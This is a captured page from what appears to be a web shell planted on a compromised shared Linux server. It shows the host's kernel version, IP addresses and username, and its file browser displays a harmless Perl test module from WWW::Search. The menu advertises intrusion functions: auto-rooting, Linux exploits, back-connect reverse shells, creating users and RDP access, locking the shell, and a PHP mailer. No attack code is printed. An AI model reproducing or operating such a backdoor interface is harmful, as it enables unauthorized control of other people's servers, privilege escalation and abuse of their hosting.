Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
WWW /
Search /
Null /
[ HOME SHELL ]
Name
Size
Permission
Action
Count.pm
3.12
KB
-rw-r--r--
Empty.pm
1.29
KB
-rw-r--r--
Error.pm
1.3
KB
-rw-r--r--
NoVersion.pm
620
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Error.pm
# $Id: Error.pm,v 1.12 2010-12-02 23:45:57 Martin Exp $ =head1 NAME WWW::Search::Null::Error - class for testing WWW::Search clients =head1 SYNOPSIS require WWW::Search; my $oSearch = new WWW::Search('Null::Error'); $oSearch->native_query('Makes no difference what you search for...'); $oSearch->retrieve_some(); my $oResponse = $oSearch->response; # You get an HTTP::Response object with a code of 500 =head1 DESCRIPTION This class is a specialization of WWW::Search that only returns an error message. This module might be useful for testing a client program without actually being connected to any particular search engine. =head1 AUTHOR Martin 'Kingpin' Thurn, C<mthurn at cpan.org>, L<http://tinyurl.com/nn67z>. =cut package WWW::Search::Null::Error; use strict; use warnings; use base 'WWW::Search'; our $VERSION = do { my @r = (q$Revision: 1.12 $ =~ /\d+/g); sprintf "%d."."%03d" x $#r, @r }; our $MAINTAINER = q{Martin Thurn <mthurn@cpan.org>}; sub _native_setup_search { my($self, $native_query, $native_opt) = @_; } # native_setup_search sub _native_retrieve_some { my $self = shift; my $response = new HTTP::Response(500, "This is a test of WWW::Search"); $self->{response} = $response; return undef; } # native_retrieve_some 1; __END__
Close